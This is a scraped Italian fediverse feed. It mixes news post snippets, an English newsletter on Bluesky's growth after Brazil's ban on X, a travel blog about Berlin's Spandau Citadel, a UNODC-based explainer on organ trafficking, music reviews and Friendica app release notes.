@Notizie dall'Italia e dal mondo
Il nuovo articolo di @valori@poliversity.it
Negli ultimi anni si sono affermati i litigation funds: anticipano i costi delle class action e, in caso di successo, trattengono parte dei rimborsi
L'articolo Litigation funds: i pericolosi rapporti tra finanza e giustizia proviene da Valori.

valori.it/litigation-funds/



Partito Mélenchon conferma mozione per destituzione di Macron • Imola Oggi
imolaoggi.it/2024/08/27/partit…


🔁🖼 Oggi si lavora sulle bozze finali dell'Handbook in lingua inglese che stiamo preparando con la Milano University Press per il corso di "smart...

Oggi si lavora sulle bozze finali dell'Handbook in lingua inglese che stiamo preparando con la Milano University Press per il corso di "smart cities, artificial intelligence and digital transformation law" dell'Università di Milano che inizierà a fin…



🔁 Cerchi Unrwa su Google e finisci… sui siti pagati dal governo di Tel Aviv pillole.graffio.org/pillole/ce…

Cerchi Unrwa su Google e finisci… sui siti pagati dal governo di Tel Aviv
pillole.graffio.org/pillole/ce…



Elly, per favore, lascia perdere Renzi in Liguria e dai la linea al centrosinistra per la Regione


@Politica interna, europea e internazionale
Questo è un appello, anzi una richiesta pressante, una supplica angosciata rivolta ai dirigenti, nazionali e locali, dei partiti della cosiddetta opposizione, e in particolare al Partito democratico. In particolare mi rivolgo alla segretaria Elly Schlein



Palestinesi denunciano: gravi le condizioni della deputata Khalida Jarrar in carcere in Israele


@Notizie dall'Italia e dal mondo
La parlamentare del Fronte popolare, detenuta senza processo da otto mesi, verrebbe tenuta in uno stretto isolamento e sottoposta a gravi restrizioni nonostante le sue precarie condizioni di salute
L'articolo



Deca – Strategia esoterica


“Ogni mio nuovo lavoro rappresenta la summa e la sintesi di tutti quelli realizzati prima, evolvendone nuovamente il significato e la portata artistica. Credo che “Strategia Esoterica” abbia comunque una forza molto superiore perché frutto di una trasmutazione molto potente”- Deca @Musica Agorà

iyezine.com/deca-strategia-eso…



The organization that runs National Novel Writing Month, a November challenge to write 50,000 words, said "the categorical condemnation of Artificial Intelligence has classist and ableist undertones."#News #AI #nanowrimo


LIBRI. Laboratorio Palestina: l’esperienza sul campo si vende in armi


@Notizie dall'Italia e dal mondo
Antony Loeweisten, giornalista investigativo australiano, traccia la linea delle relazioni tra l’industria bellica israeliana e molti paesi del mondo. La vendita di armi emerge come priorità impellente per Tel Aviv a dispetto della natura politica dell’acquirente
L'articolo




GAZA. Israele costruisce un nuovo corridoio per il controllo permanente


@Notizie dall'Italia e dal mondo
Cominciata a inizio novembre, secondo il Forensic Architecture, la costruzione della strada è costata la distruzione di fattorie, terreni agricoli, abitazioni, frutteti e garantirà alle truppe un accesso sicuro fin dentro Gaza City
L'articolo GAZA. Israele



#NotiziePerLaScuola
È disponibile il nuovo numero della newsletter del Ministero dell’Istruzione e del Merito.


Pibiesse, la tipografia che guarda al futuro


@Notizie dall'Italia e dal mondo
Il nuovo articolo di @valori@poliversity.it
La Pibiesse è una tipografia, ma anche un progetto di innovazione sociale che vuole diventare modello per la riqualificazione del territorio
L'articolo Pibiesse, la tipografia che guarda al futuro proviene da Valori.

valori.it/pibiesse-storie-dal-…



Aerei e navi nella tassonomia europea: Bruxelles dovrà risponderne in tribunale


@Notizie dall'Italia e dal mondo
Il nuovo articolo di @valori@poliversity.it
Bruxelles etichetta come “investimenti verdi” aerei e navi inquinanti: una coalizione di ong la trascina in tribunale
L'articolo Aerei e navi nella tassonomia europea: Bruxelles dovrà risponderne in tribunale proviene da Valori.



L'Ucraina viene distrutta - ma nessuno in Occidente vuole assumersene la responsabilità - professore americano
controinformazione.info/lucrai…


Bluesky experiences a massive new wave of signups from Brazil, Premium feeds with sub.club, and much more.
[share author='Laurens Hof' profile='https://fediversereport.com/author/laurenshof/' avatar='https://poliverso.org/photo/206608119366e42c304ffac007248590-5.jpeg?ts=1734620326' link='https://fediversereport.com/last-week-in-fediverse-ep-82/' posted='2024-09-01 18:04:28' guid='08552256-1db60dc7714646e3-cb23b587' message_id='https://fediversereport.com/last-week-in-fediverse-ep-82/']Last Week in Fediverse – ep 82

1 million new accounts on Bluesky as Brazil bans X, and premium feeds with Sub.club, and much much more.

Brazil bans X, and a signup wave to Bluesky


The Brazilian supreme court has banned the use of X in an ongoing legal fight with Elon Musk. The ban follows after a long trajectory of legal issues between the Brazilian government and Musk’s X. In April 2024, the Brazilian court ordered X to block certain X accounts that were allegedly related to the 2023 coup attempt, which Musk refused to do. In that same time period, President Luiz Inácio Lula da Silva opened an account on Bluesky, and there was already an inflow of a Brazilian community into Bluesky. Now, the legal fight has further escalated over X’s refusal to appoint a legal representative in the country, and Musk’s continuing refusal to comply with Brazil’s laws and regulation has resulted in the supreme court banning the use of X in the country altogether.

The ban on X has caused a massive signup wave to Bluesky, with over 1 million new accounts created in just three days, of which the large majority are from Brazil. The user statistics shot up even more than that, suggesting that there are a lot of people with an existing account logging back in as well.

The new inflow of people to Bluesky is having some significant effects on the network, as well as on the state of decentralised social networks more broadly:

  • President Lula is putting actual focus on Bluesky. In one of his final posts on X, Luala listed in non-alphabetical order all other platforms that he is active on, and placed Bluesky at the top of the list. Posts by Lula that are placed on Bluesky (134k followers) as well as on Threads (2.4m followers) get more than 5 times as much likes on Bluesky. Today, Lula explicitly asked people on Bluesky what they thought about the platform, in a post that got over 30k likes and counting. It is hard to imagine that the Brazilian government is not paying attention to this all, and is looking which platform(s) the Brazilian community is moving towards in the wake of the ban on X.
  • Brazilians are a very active community on the internet (see Orkut), and bring with them their own unique culture to Bluesky. The current decentralised social networks are heavily focused on US politics, judged by top posts on both Mastodon and Bluesky, and beyond shitposts and memes there is surprisingly little space for mainstream pop culture and sports. The Brazilian community does seem to bring a large number of pop culture and sports to Bluesky, significantly diversifying the topics of discussion, and in turn, creating more space for other people who are interested in that in the future. The activity of Brazilians on microblogging can also be seen in the like counts on popular posts of Bluesky: before this week, the most popular posts of any given day usually got around 3k likes, this has sprung up to 30k to 50k likes. Brazilians are so chatty in fact, that currently 81% of the posts on the network are in Portugese, and the amount of accounts of people who post on a given day has gone up from a third to over 50%.
  • The Bluesky engineers have build a very robust infrastructure system, and the platform has largely cruised along fine without issues, even when faced with a 15x increase in traffic. This all without having to add any new servers. For third party developers, such as the Skyfeed developer, this increase in traffic did came with downtime and more hardware requirements however. It shows the complications of engineering an open system, while the Bluesky team itself was prepared with their core infrastructure, third party infrastructure, on which a large number of custom feeds rely, was significantly less prepared for the massive increase in traffic.

In contrast, the ban on X in Brazil has made little impact on Mastodon, with 3.5k new signups from Brazil on Mastodon.social. I’d estimate that this week has seen 10k new accounts above average, with 15k new accounts the previous week and 25k in this week. That places Mastodon two orders of magnitude behind Bluesky in signups from Brazil. There are a variety of reasons for this, which deserve their own analysis, this newsletter is long enough as it is. One thing I do want to point out is within fediverse community there are two sub communities that each have their own goals and ideas about the fediverse and growth. Some people responded with the news that most Brazilians went to Bluesky with type of response that indicated that they appreciate the small, quiet and cozy community that the fediverse currently provides, and a distrust of the growth-at-all-costs model for social networks. For other people however, their goal of the fediverse is to build a global network that everyone is a part of and everyone uses (‘Big Fedi’), a view of the fediverse that is also represented in the latest episode of the Waveform podcast (see news below). And if the goal is to build ActivityPub into the default protocol for the social web, it is worth paying attention to what is happening right now in the Brazilian ATmosphere.

The News


Sub.club is a new way to monetise feeds on the fediverse, with the goal of bringing the creator economy to the fediverse. It gives people the ability to create premium feeds that people can only access via a subscription. People can follow this feed from any Mastodon account (work on other fediverse platforms is ongoing). Sub.club handles the payment processes and infrastructure, for which they charge 6% of the subscription fee (compared to 8-12% Patreon charges). Sub.club also makes it possible for other apps to integrate, both IceCubes and Mammoth have this option. Bart Decrem, who is one of the people behind Sub.club, is also the co-founder of the Mastodon app Mammoth. Sub.club also explicitly positions itself as a way for server admins to fund their server. Most server admins rely on donations by their users, often via services like Patreon, Ko-fi, Open Collective or other third party options. By integration payments directly into the fediverse, Sub.club hopes that the barrier for donations will be lower, and more server admins can be financially sustainable.

Newsmast has build a new version of groups software for the fediverse, and the first group is dedicated to the Harris campaign. There are few types of groups available that integrate with Mastodon, such as with Friendica or a.gup.pe. These groups function virtually identical to hashtags, by boosting out posts where the group account is tagged in to everyone who follows the group account. As there is no moderation in these types of group accounts, it allows anyone to hijack the group account. A group account dedicated to a political campaign is especially vulnerable to this. On Mastodon a volunteer Harris Campaign group used a Friendica group for campaign organising, but the limited moderation tools (blocking a user from following the group) that are available are not working, which allowed blocked users to still get their posts boosted by the group account. Newsmast’s version of Groups gives (working) moderation tools, and only boosts top level comments and not replies, to cut down on the noise. For now, the new Group is only available to the Harris Campaign group for testing, but it will come later to Mastodon servers that run the upcoming Patchwork plugin.

Bluesky added quite a number of new anti-toxicity features in their most recent app update. Bluesky has added quote posting controls, allowing people to set on a per-post basis if people can quote the post or not. There is also the option to remove quotes after the fact as well: if you’ve allowed quote posts on a post you’ve made, but someone made a quote post that you do not feel comfortable with, you have the possibility to detach your post. Another update is the possibility to hide replies on your posts. Bluesky already hides comments under a ‘show more’ button if the comment is labeled by a labeler you subscribe to. You now have the option to do so on all comments that are made on your posts, and the hidden comment will be hidden for everyone. Finally, Bluesky has changed how replies are shown in the Following feed, which is an active subject of discussion. I appreciate the comments made by Bluesky engineer Dan Abramov here, who notes there are two different ways of using Bluesky, who each prioritise comments in conflicting ways. As new communities grow on Bluesky, prioritising their (conflicting) needs becomes more difficult, and I’m curious to see how this further plays out.

The WVFRM (Waveform) podcast of popular tech YouTuber MKBHD has a special show about the fediverse, ‘Protocol Wars – The Fediverse Explained!’. It is partially a discussion podcast, partial explainer, and partial interview with many people within the community. They talk with Mastodon’s Eugen Rochko, Bluesky’s Jay Graber, Threads’s Adam Mosseri, and quite some more people. It is worth noting for a variety of reason. The show is quite a good introduction, that talks to many of the most relevant names within the community. MKBHD is one of the biggest names in the tech creator scene, and many people are paying attention to what he and his team is talking about. Furthermore, I found the framing as ‘protocol wars’ interesting, as the popularity of Bluesky in Brazil as an X replacement indicates that there is indeed a race between platforms to be build on top of the new dominant protocol.

Darnell Clayton has a very interesting blog post, in which he discovers that there is a discrepancy in follower count for Threads accounts that have turned on fediverse sharing. Clayton notes that the follower count shown in the Threads app is lower than the one shown in a fediverse client, for both Mastodon and Flipboard. He speculates that this difference is the number of fediverse accounts that follow a Threads account. It should be noted that this is speculation and has not been confirmed, but if this is true, it would give us a helpful indication of how many fediverse accounts are using the connection with Threads. While we’re talking about Threads accounts, Mastodon CEO Eugen Rochko confirmed that the mastodon.social server has made a connection with 15.269 Threads accounts who have turned on fediverse sharing.

The Links


That’s all for this week, thanks for reading.

#fediverse

fediversereport.com/last-week-…



Ieri avevo in programma un giro per negozi di biciclette per vedere e provare un po' di bici elettriche. Uno di questi si trova a Spandau, che rispetto a casa mia è inculatissima (un'ora di viaggio minimo) per cui ho unito l'utile al dilettevole e con l'occasione sono stata anche a visitare la Cittadella.


Vista dalla Juiliusturm (1230), dicono il più antico edificio preservato di Berlino.

Questa scelta mi ha innanzitutto regalato la conoscenza degli Heilung, band che pesta tantissimo e che suonava la sera stessa proprio nella Cittadella. I tecnici che ne facevano il soundcheck mentre io gironzolavo me li hanno fatti apprezzare. Se amate la musica che pesta tantissimo date loro un orecchio, secondo me possono messere d'accordo gente dai gusti diversi (purché pestino! L'ho detto che pestanopestanopestano?).

Poi va detto che il biglietto di ingresso a 4,50 € stracciati dà accesso a tutti e sei i musei presenti nel complesso, piccoli, diversi, ma tutti meritevoli. Ho saltato solo il Centro d'Arte Contemporanea perché chiuso per allestimento di una mostra.

Prima fermata: la "finestra archeologica"

Qui sono conservati gli scavi archeologici che hanno portato alla luce le tre fasi costruttive della fortificazione. Dal XIII al XVI secolo si vede l'evoluzione dalla prima palizzata in legno, alle mura in pietra medievali, al castello in stile rinascimentale e mattoni rossi oggi visibile. Vengono spiegati anche dettagli ingegneristici, tipo che per costruire i bastionazzi così come sono oggi hanno "sbrodolato" fuori dai confini dell'isoletta su cui era sorto il nucleo originario. Per costruire in acqua hanno praticamente fatto una fitta base di "denti" di legno su cui poi è stata costruita la struttura attuale. Che non sia sprofondato tutto per me ha del miracoloso.

Seconda fermata: il museo civico di Spandau

Qui sono esposti reperti della storia di Spandau: dalle repliche dei documenti ufficiali, agli oggetti di uso comune, al prodotto dell'industria qui storicamente stanziata, al (ovviamente) nazionalsocialismo, alla divisione.


Questi sono giocattoli, che già di per sé mi fa rabbrividire. Alle stuatuine di Hitler e Göring si può alzare il braccino per fargli fare il saluto nazista. Ha un sapore distopico, invece è successo davvero: dei bambini hanno giocato con 'sta roba.

Gironzolando qui ho scoperto che parte di Metropolis è stata girata a Spandau (pensavo solo ai Babelstudios, e invece) e c'è un memoriale di una persona che ha partecipato alla produzione che vorrò leggere per intero. Amo Metropolis!

Terza fermata: la sala d'armi (o come diavolo vogliamo tradurre Exerzierhalle)

Qui sono conservati cannoni. Decine e decine di cannoni. Il più vecchio è del primo '400, il più giovane risale alla Prima Guerra Mondiale.


Immaginate di stare accovacciati qui dietro a sparare al "nemico".

La sala è chiusa e, con il caldo, dentro ristagna un odore che ricorda un'officina meccanica, ma con un "twist" tutto suo. Il mio cervello lo ha etichettato come "odore di guerra", ma non penso che sul campo la puzza fosse quella (o almeno non soltanto quella).
Toccacciando in giro (perché qui è concesso mettere le mani sugli artefatti) ho poi constato come ci sia stata un'epoca, tra '600 e '700, in cui usava mettere motti vari sui cannoni. Questo qua mi ha colpita di più:


Dice:"Saturnus frist (!) die Kind allein ich fress sie aller gros (!) und klein" (grossomodo: "Saturno mangia solo i bambini, io mangio tutti, grandi e piccini". Che detto da un cannone ci sta).

Quarta tappa: il deposito provvigioni

Questo è un edificio del periodo rinascimentale, in parte ricostruito, oggi adibito a galleria che preserva una serie di monumenti scultorei precedentemente sparsi per Berlino dal XVIII al XX secolo. Praticamente un consesso di figure rilevanti per la storia della città (e non solo). Alla fine c'è anche lui: il capoccione di Lenin!


Avete presente il megaprogetto di Hitler per la trasformazione di Berlino nella "Welthauptstadt Germania"? Come doveva diventare una città monumentale, con al centro un ipermega edificio celebrativo? Ecco. Questo plastico rende l'idea di quanto megalomane fosse il progetto di quell'edificio: quella cosina a destra è la porta di Brandeburgo, in scala.

Quinta tappa: la casa del comandante

L'ho vista per ultima, ma, essendo sopra la biglietteria, in realtà si potrebbe vedere anche come prima cosa. Qui sono conservati reperti e documenti della storia della Cittadella, altri dettagli sulle fasi costruttive, ma anche flora e fauna del luogo.

Che dire alla fine di tutto questo? Ma niente, solo che ogni volta che sfioro la storia di questa città il brivido lungo la schiena è assicurato. Qua sono successe cose folli.

(Oh, le bici in tutto questo le ho provate eh. Ho due candidate tra cui decidere).

#MuseiDaVedere #Berlino #Spandau



TRAFFICO UMANO PER LA RIMOZIONE DI ORGANI. UNA PIAGA GLOBALE


Immagine/foto
Il traffico umano per rimozione di organi è una forma di sfruttamento in cui le vittime, spesso vulnerabili, sono ingannate o costrette a donare organi.Le vittime sono spesso sfruttate e la loro "consenso" è invalido a causa di inganno o abuso di vulnerabilità.
La domanda è alimentata dalla carenza globale di organi per trapianti etici. Con meno del 10% della domanda globale soddisfatta, molti pazienti disperati si rivolgono a mezzi illegali. Questo crea un mercato lucrativo per il traffico di organi, calcolato per un importo compreso tra 840 milioni e 1,7 miliardi di dollari all'anno.
I reni e parti di fegato sono gli organi più frequentemente prelevati.
I trafficanti di organi operano all'interno di reti globali complesse e organizzate, richiedendo un'infrastruttura sofisticata che coinvolge specialisti medici e coordinamento logistico. Utilizzano pubblicità locali, social media e approcci diretti da parte di reclutatori, spesso ex vittime o persone fidate nella comunità. Queste reti sono flessibili e possono funzionare come unità mobili o gruppi specializzati.
Le vittime tipiche del traffico di organi per rimozione provengono da contesti poveri, non istruiti e vulnerabili. Gruppi criminali organizzati mirano specificamente a individui disoccupati, migranti, richiedenti asilo e rifugiati. Molti di loro sono costretti, ingannati o vedono la vendita di organi come ultima risorsa per migliorare la loro situazione.
Le conseguenze per le vittime includono gravi problemi di salute.
L'UNODC, l’Ufficio delle Nazioni Unite per il controllo della droga e crimine (United Nations Office on Drugs and Crime) è un'agenzia delle Nazioni Unite fondata nel 1997 con sede a Vienna, sta lavorando per migliorare le risposte legali e di giustizia a questo crimine. Lo ha fatto anche attraverso una serie di pubblicazioni (unodc.org/unodc/en/human-traff…), tra le quali - di maggior interesse per la cooperazione internazionale di polizia - quella riferita al Toolkit on the Investigation and Prosecution of Trafficking in Persons for Organ Removal (unodc.org/res/human-traffickin…)
Immagine/foto
Secondo la Dichiarazione di Istanbul sul Traffico di Organi e sul Turismo del Trapianto (declarationofistanbul.org/imag…) , le definizioni chiave relative al traffico di organi includono:

1. Traffico di organi: attività illecite che coinvolgono la rimozione e il commercio di organi umani, spesso attraverso coercizione o inganno.
2. Turismo di trapianto: viaggio di pazienti verso paesi dove le leggi sul trapianto sono meno rigorose, per ricevere organi in modo non etico.
3. Commercialismo del trapianto: pratica di compensare finanziariamente i donatori di organi, violando i principi di donazione volontaria e non remunerata.

Queste definizioni mirano a guidare le politiche e le pratiche nel campo della donazione e del trapianto di organi.
Lo scopo principale del traffico di organi, secondo il Protocollo delle Nazioni Unite, è lo sfruttamento di donatori vulnerabili per il profitto finanziario derivante dalla rimozione e dal trapianto illegale di organi. Questo crimine è considerato una forma di sfruttamento e violazione dei diritti umani, mirata a trarre vantaggio da persone in situazioni di vulnerabilità. Il protocollo mira a prevenire e punire tali pratiche, proteggendo i diritti delle vittime.
Le conseguenze legali per le persone coinvolte nel traffico di organi possono includere pene detentive per reati come la rimozione illegale di organi, la sollecitazione di donatori o riceventi, e l'offerta di vantaggi indebiti a funzionari sanitari. Inoltre, possono essere perseguiti per reati di complicità, tentativo di traffico e pubblicità di organi a scopo di lucro. Le sanzioni variano a seconda della legislazione nazionale, ma possono comportare anche multe significative e la confisca dei beni ottenuti illecitamente.
Gli stati possono ritenere responsabili i destinatari di organi trafficati in base alla legislazione nazionale che attua la Convenzione contro il Traffico di Persone, che prevede la responsabilità per chi utilizza i servizi di una vittima di traffico, sapendo della sua condizione. Inoltre, gli stati sono obbligati a criminalizzare la partecipazione e l'organizzazione di atti di traffico di organi, estendendo la responsabilità anche a persone giuridiche. Tuttavia, la decisione di perseguire i destinatari degli organi è complessa, poiché spesso si trovano in situazioni disperate.

#UNODC #TRAFFICODIORGANI



Recensione : MELT-BANANA – 3 + 5


“Che cazzo è ‘sta roba?!?!?!?” si chiese meravigliato chi vi scrive, quando ha scoperto dell’esistenza, anni fa, dei giapponesi Melt-Banana, dal 1992 tra i principali agitatori della scena/movimento concettuale “Japanoise”, vale a dire degli autentici terroristi sonori, da Tokyo con furore, fautori di uno schizofrenico sound a base di hardcore ipercinetico, noise rock e frattaglie di musica elettronica ispirata da videogames, anime e fumetti manga. @Musica Agorà iyezine.com/melt-banana-3-5


.... E dopo la variante xec, verrà la variante Pdor, figlia di Kmer, della tribù di Istar, della terra desolata di Xmir...



Il Burkina Faso ha deciso di nazionalizzare le miniere d’oro l L'Indipendente

"L’azione del governo di Ouagadougou rientra in un contesto più ampio, che vede sempre più nazioni africane riappropriarsi delle proprie risorse per orientarne i profitti a beneficio dello sviluppo nazionale e non di società straniere. Una tendenza ancora più marcata in quegli Stati africani desiderosi di riacquisire la propria indipendenza politica e strategica dalle direttive neocoloniali occidentali."

lindipendente.online/2024/08/3…



@RaccoonForFriendica rilasciata nuova versione 0.1.0-alpha15 che include la modifica dei dati del profilo (purtroppo parziale, perché su Friendica l'endpoint non permette di aggiornare tutti i dati finora), la visualizzazione del testo alternativo delle immagini, la possibilità di condividere gli URL dei profili utente e una serie di correzioni nel caricamento delle liste (a.k.a. "cerchie") e dei gruppi in modalità forum. Ci stiamo avvicinando a una versione beta, colgo l'occasione di ringraziare anche N7-X che mi ha dato un contributo nella visualizzazione delle bottom sheet. Buon weekend, ragazzɜ! #friendica #friendicadev #androidapp #androiddev #kotlin #kmp #compose #opensource #fediverseapp #livefasteattrash

reshared this

in reply to 𝔻𝕚𝕖𝕘𝕠 🦝🧑🏻‍💻🍕

Come non detto, forse meglio usare la alpha16, dove ho fatto alcune correzioni di layout dell'ultimo minuto. Ora stacco sul serio, buon weekend!

RaccoonForFriendica reshared this.

in reply to 𝔻𝕚𝕖𝕘𝕠 🦝🧑🏻‍💻🍕

E dato che non c'è due senza tre, alpha17, perché c'erano dei bug nella gestione delle richieste di follow e la ricerca utenti poteva essere ottimizzata.

RaccoonForFriendica reshared this.



Russia: Caccia F16, il primo fiasco ucraino e l'ironia di Mosca - Tatiana Santi - Il Vaso di Pandora
ivdp.it/articoli/caccia-f16-il…


USA: l globalismo ha fallito nella visione dell'americano medio - Gabriele Sannino - Il Vaso di Pandora
ivdp.it/articoli/l-globalismo-…